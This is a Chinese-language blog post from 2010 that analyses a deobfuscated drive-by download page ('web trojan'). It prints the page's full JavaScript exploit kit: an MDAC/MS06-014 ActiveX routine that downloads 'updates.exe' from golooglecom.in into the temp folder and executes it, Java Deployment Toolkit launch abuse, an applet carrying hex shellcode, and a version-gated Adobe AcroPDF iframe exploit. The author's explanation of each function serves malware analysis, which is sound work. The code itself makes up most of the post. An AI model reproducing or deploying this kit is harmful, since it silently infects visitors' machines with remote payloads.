我对这个代码好好整理了一下,替换掉连接符,咱们看看
程序代码 程序代码
<!-- Malzilla Project v.1 --><!-- DAT: 2010-5-14 6:23:53 --><!-- URL: golooglecom.in/rz141_at/index.php?s=208feca1a8b149965fa6d3be651c5953 --><!-- REF: http://fracala.com/bu1/ --><!-- UAS: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) --><!-- CCK:  -->
<html><TEXTAREA id=txt rows=57 cols=108></*TEXTAREA><script type="text/JavaScript">

     var Shy1qHjEP8UX='http://golooglecom.in/rz141_at/load.php?spl=mdac&fh=';
     function HSxq3uCd9eJX(z1McmSTMqbSV,LthNvqt2Utda)     {
            var cBjl0nHGVGGM=null;
            try{cBjl0nHGVGGM=z1McmSTMqbSV.CreateObject(LthNvqt2Utda)
            }catch(e){}if(!cBjl0nHGVGGM){
                try{cBjl0nHGVGGM=z1McmSTMqbSV.CreateObject(LthNvqt2Utda,"")
            }catch(e){}}if(!cBjl0nHGVGGM){
                try{cBjl0nHGVGGM=z1McmSTMqbSV.CreateObject(LthNvqt2Utda,"","")
            }catch(e){}}if(!cBjl0nHGVGGM){
               try{cBjl0nHGVGGM=z1McmSTMqbSV.GetObject("",LthNvqt2Utda)
            }catch(e){}}if(!cBjl0nHGVGGM){
                try{cBjl0nHGVGGM=z1McmSTMqbSV.GetObject(LthNvqt2Utda,"")
            }catch(e){}}if(!cBjl0nHGVGGM){
               try{cBjl0nHGVGGM=z1McmSTMqbSV.GetObject(LthNvqt2Utda)
            }catch(e){}}return(cBjl0nHGVGGM);
    }
    function S1aw85UTWSKZ(wp45E2703Smo)    {
        qFBmrdHqXyES="updates.exe";
        var eWCVBW3Khm7r=wp45E2703Smo.CreateObject("Scripting.FileSystemObject","");
        var sap=HSxq3uCd9eJX(wp45E2703Smo,"Shell.Application");
        var z9TJ28uFxxJC=HSxq3uCd9eJX(wp45E2703Smo,"ADODB.Stream");
        var FO86eORCO20W=null;qFBmrdHqXyES=eWCVBW3Khm7r.BuildPath(eWCVBW3Khm7r.GetSpecialFolder(2),qFBmrdHqXyES);z9TJ28uFxxJC.Mode=3;
        try{
            FO86eORCO20W=HSxq3uCd9eJX(wp45E2703Smo,"Microsoft.XMLHTTP");FO86eORCO20W.open("GET",Shy1qHjEP8UX,false);
        }catch(e){try{
            FO86eORCO20W=HSxq3uCd9eJX(wp45E2703Smo,"MSXML2.XMLHTTP");FO86eORCO20W.open("GET",Shy1qHjEP8UX,false);
                    }catch(e){try{
                            FO86eORCO20W=HSxq3uCd9eJX(wp45E2703Smo,"MSXML2.ServerXMLHTTP");FO86eORCO20W.open("GET",Shy1qHjEP8UX,false);
                        }catch(e){try{
                            FO86eORCO20W=new XMLHttpRequest();FO86eORCO20W.open("GET",Shy1qHjEP8UX,false);
                           }catch(e){
                                  return 0;
                                     }
                           }
                        }
                    }
              z9TJ28uFxxJC.Type=1;
              FO86eORCO20W.send(null);
              rb=FO86eORCO20W.responseBody;z9TJ28uFxxJC.Open();
              z9TJ28uFxxJC.Write(rb);
              z9TJ28uFxxJC.SaveTofile(qFBmrdHqXyES,2);
              sap.ShellExecute(qFBmrdHqXyES);
              return 1;
      }
    function mdac(){
        var iPM2s9qnO2ZF=0;
        var vezc7KCSqOx3d=new Array('BD96C556-65A3-11D0-983A-00C04FC29E36','BD96C556-65A3-11D0-983A-00C04FC29E30','AB9BCEDD-EC7E-47E1-9322-D4A210617116','0006F033-0000-0000-C000-000000000046','0006F03A-0000-0000-C000-000000000046','6e32070a-766d-4ee6-879c-dc1fa91d2fc3','6414512B-B978-451D-A0D8-FCFDF33E833C','7F5B7F63-F06F-4331-8A26-339E03C0AE3D','06723E09-F4C2-43c8-8358-09FCD1DB0766','639F725F-1B2D-4831-A9FD-874847682010','BA018599-1DB3-44f9-83B4-461454C84BF8','D0C07D56-7C69-43F1-B4A0-25F5A11FAB19','E8CCCDDF-CA28-496b-B050-6C07C962476B',null);
        while(vezc7KCSqOx3d[iPM2s9qnO2ZF]){
            var wp45E2703Smo=null;
            wp45E2703Smo=document.createElement("object");
            wp45E2703Smo.setAttribute("classid","clsid:"+vezc7KCSqOx3d[iPM2s9qnO2ZF]);
              if(wp45E2703Smo){
                    try{var or6DpKfeS0xU=HSxq3uCd9eJX(wp45E2703Smo,"Shell.Application");
                 if(Or6DpKfeS0xU){
                      if(S1aw85UTWSKZ(wp45E2703Smo))return 1;}
                  }catch(e){}
              }
              iPM2s9qnO2ZF++;
              }
    }
            
     setTimeout("mdac();",200);
     function java_dt(){
        try{var u = "-J-jar -J\\\\golooglecom.in\\smb\\new.avi http://golooglecom.in/rz141_at/load.php?spl=x1YY&fh=";if (window.navigator.appName == "Microsoft Internet Explorer"){
        try { var o = document.createElement("OBJECT");o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";o.launch(u);
        } catch(e) {var o2 = document.createElement("OBJECT");o2.classid = "clsid:8AD9C840-044E-11D1-B3E9-00805F499D93";o2.launch(u);}
        } else {
            var o = document.createElement("OBJECT");
            var n = document.createElement("OBJECT");o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";n.type = "application/java-deployment-toolkit";document.body.appendChild(o);document.body.appendChild(n);try {o.launch(u);} catch (e) {n.launch(u);}}} catch (e) {}
            }
     setTimeout("java_dt();",1000);
     function java_gsb(){
        var javaelem = document.createElement("applet");
        var paramelem = document.createElement("param");
        paramelem.setAttribute("name", "sc");
        paramelem.setAttribute("value", "909090eb115b4b33c96681c9af0180340ba6e2faeb05e8eaffffff4f7ca6a6a6f9c20796a6a6a62de6aa2dd6ba0b2dceae2dd6862da62698cdd355e0e02698c3d34ae0e02698d4d351e0e02698c8d3562d51cca5ff4efda6a6a6445fcec9c8a6a6ced3d4cacbf259b02d4e4ee3a6a6a6ceca9594a6ced5cec3caf259b02d4e4e97a6a6a6254ae62d7af5cce659f0a261a2a5c788c3dec061e2a5a2c3a69566f6f6f5f1f659f0aa2d7af6f6f6f5f6f659f0b659f0aef7f02dd39a2dd288dea553f02dd086a553956fefe70ba563957da918b69c70d2ae676daba57ce64d579db9d341f82df882a57bc02daaed2df8baa57b2da22da5630df8ff654e8759595928e8a84a956c2cfdd87e44d590bc89d6f81d47bdced2d2d69c8989c1c9cac9c9c1cac3c5c9cb88cfc889d4dc979297f9c7d289cac9c7c288d6ced699d5d6ca9bccc7d0c7f9c1d5c480c0ce9ba6");
        javaelem.setAttribute("code", "AppleT");
        javaelem.setAttribute("archive", "1.jar");
        javaelem.setAttribute("width", "100%");
        javaelem.setAttribute("height", "100%");
        javaelem.appendChild(paramelem);
        document.body.appendChild(javaelem);
    }
        setTimeout("java_gsb();",3000);
     function pdf_ie(){
       try{
       var pdfObject = document.createElement("OBJECT");
       pdfObject.setAttribute("id", "jdf1");
       pdfObject.setAttribute("classid", "clsid:CA8A9780-280D-11CF-A24D-444553540000");
       document.body.appendChild(pdfObject);
       var ver = jdf1.GetVersions();
       ver = ver.split(",");
       ver = ver[1].split("=");
       ver = ver[1];if (((ver >= "7") && (ver < "7.1.4")) || ((ver >= "8") && (ver < "8.1.7")) || ((ver >= "9") && (ver < "9.3"))){
       var pdfelement = document.createElement("iframe");
       pdfelement.setAttribute("src", "http://golooglecom.in/rz141_at/pdf.php?fh=");
       pdfelement.setAttribute("width", 200);
       pdfelement.setAttribute("height", 200);
       document.body.appendChild(pdfelement);}
       }catch(e){}
     }
      setTimeout("pdf_ie();",9000);                
    
       </script>


仔细看看这个代码可以发现,他不是一个单一的网马来的。他至少利用了4个漏洞来下载木马。

首先是mdac函数,他是利用的iems06014漏洞来进行传播,mdac函数首先是从13个问题组件的classid中选择,列举一部分

程序代码 程序代码
RDS.DataSpace    BD96C556-65A3-11D0-983A-00C04FC29E36     ms06014

Business Object Factory    AB9BCEDD-EC7E-47E1-9322-D4A210617116    

Outlook Data Object         0006F033-0000-0000-C000-000000000046


VsaIDE.DTE     E8CCCDDF-CA28-496b-B050-6C07C962476B


Microsoft.DbgClr.DTE.8.0'    D0C07D56-7C69-43F1-B4A0-25F5A11FAB19



如果有一个存在,那么就利用其下载目标文件。S1aw85UTWSKZ是主要的执行下载和执行任务的函数。利用Scripting.FileSystemObject来查找路径,在这里可见是存放到temp目录,利用Microsoft.XMLHTTP,MSXML2.XMLHTTP或者MSXML2.ServerXMLHTTP来执行下载的指令,利用ADODB.Stream来打开,另存为下载的文件,最后使用Shell.Application的ShellExecute方法来执行下载的木马。对于ie漏洞利用的基本流程就是这样。

看下一个
java_dt这个函数,这个是利用Java开发工具包URL参数远程代码执行漏洞的一个函数

java_gsb是另外一个利用jave的applet对象的漏洞利用函数,他的这个value值,应当是作者的利用网址。

pdf_ie是利用Adobe Reader/Acrobat AcroPDF.dll ActiveX控件远程代码执行漏洞的函数


好了,这个网马的解密基本就是这样了,他分别利用了IE的ms06014漏洞,Java开发工具包URL参数远程代码执行漏洞和Adobe Reader/Acrobat AcroPDF.dll ActiveX控件远程代码执行漏洞等3个系统漏洞来完成设计目标。

全文完

by  daokers



以下说明属本文之一部分:
转载请保持完整并注明:转自 金刀客[www.daokers.com]


[本日志由 admin 于 2010-10-16 11:32 AM 编辑]
相关日志:
在线RSS阅读器订阅:
feedsky
抓虾 pageflakes Rojo google reader
my yahoo newsgator bloglines 有道
鲜果 飞豆 哪吒 Netvibes
Netvibes Netvibes

手机订阅:


本站订阅地址:
RSS2:点击复制
Atom:点击复制
        本站所有原创文章均遵循 [创作共用协议]
        本站原创文章可以转载,但须保持完整性并注明出处。
        COPYRIGHT 2008-2010  §  HTTP://WWW.DAOKERS.COM  §    ALL RIGHTS
评论: 1 | 引用: 0 | 查看次数: -
回复回复描述我如何爱你[2010-06-04 10:31 PM | del]
发表评论
昵 称:
密 码: 游客发言不需要密码.
验证码: 验证码提示:单击自动获取验证码
内 容:
最多可输入,当前共,还可输入
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.